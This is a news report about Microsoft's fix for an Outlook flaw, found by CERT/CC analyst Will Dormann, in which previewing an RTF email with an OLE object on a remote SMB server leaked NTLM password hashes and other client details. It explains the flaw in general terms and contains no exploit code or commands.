Video: When it comes to malware, Windows 10 is twice as secure as Windows 7
Microsoft has fixed an important Outlook bug it's known about for over a year, capable of leaking password hashes when users preview a Rich Text Format (RTF) email with remotely hosted OLE objects.
The bug, reported by CERT/CC vulnerability analyst Will Dormann in November 2016, was finally fixed in yesterday's Patch Tuesday release.
The risk to passwords stems from how Outlook handles RTF email with Object Linking and Embedding (OLE) objects that are hosted on a remote SMB server.
SMB (Server Message Block) is a network file-sharing protocol. SMB servers can use Microsoft's NT LAN Manager (NTLM) authentication protocol for establishing a connection between a Windows client and an SMB server.
In 2016, Dormann discovered that Microsoft didn't apply the same restrictions on content loaded from a remote SMB server as it did for web-hosted content.
Outlook won't, for example, automatically load web-hosted images in email because it may leak a client's IP address and metadata details such as the time the email is viewed.
However, this precaution isn't present in Outlook when recipients preview an RTF email message with an OLE object loaded from a remote SMB server.
Dormann discovered that the OLE-SMB scenario also leaks much more than a user's IP address. As soon as the email is previewed, the PC automatically negotiates an SMB session with a potentially malicious remote SMB server, which in turn leaks the client's IP address, domain name, user name, host name, and the SMB session key in the form of an NTLM over SMB password hash.